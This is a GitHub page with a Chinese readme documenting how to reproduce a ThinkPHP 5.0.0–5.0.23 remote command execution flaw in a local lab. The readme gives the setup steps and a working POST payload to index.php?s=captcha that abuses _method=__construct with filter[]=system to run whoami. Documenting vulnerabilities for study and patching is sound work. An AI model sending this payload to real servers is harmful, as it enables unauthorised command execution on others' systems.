Name		Name	Last commit message	Last commit date
parent directory ..
0.png		0.png
readme.md		readme.md
thinkphp版本总结.txt		thinkphp版本总结.txt

readme.md

0x00 软件介绍

ThinkPHP：一款在中国流行的php开发框架

0x01 复现环境

使用环境：win10 x64
复现版本：ThinkPHP 5.0.22

0x02 环境搭建

下载thinkphp_5.0.22_with_extend.zip
解压后访问http://127.0.0.1/thinkphp_5.0.22_with_extend/public/index.php

0x03 利用条件

无

0x04 影响版本

ThinkPHP 5.0.0 ~ 5.0.23

0x05 漏洞复现

攻击环境：win10 x64

攻击payload如下：

http://127.0.0.1/thinkphp_5.0.22_with_extend/public/index.php?s=captcha

POST:

_method=__construct&filter[]=system&method=get&get[]=whoami

执行结果如下图

0x06 批量脚本

无

0x07 踩坑记录

无

0x08 参考链接

https://xz.aliyun.com/t/3845

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

ThinkPHP远程命令执行漏洞（暂无编号）

ThinkPHP远程命令执行漏洞（暂无编号）

readme.md

0x00 软件介绍

0x01 复现环境

0x02 环境搭建

0x03 利用条件

0x04 影响版本

0x05 漏洞复现

0x06 批量脚本

0x07 踩坑记录

0x08 参考链接

Files

ThinkPHP远程命令执行漏洞（暂无编号）

Directory actions

More options

Directory actions

More options

Latest commit

History

ThinkPHP远程命令执行漏洞（暂无编号）

Folders and files

parent directory

readme.md

0x00 软件介绍

0x01 复现环境

0x02 环境搭建

0x03 利用条件

0x04 影响版本

0x05 漏洞复现

0x06 批量脚本

0x07 踩坑记录

0x08 参考链接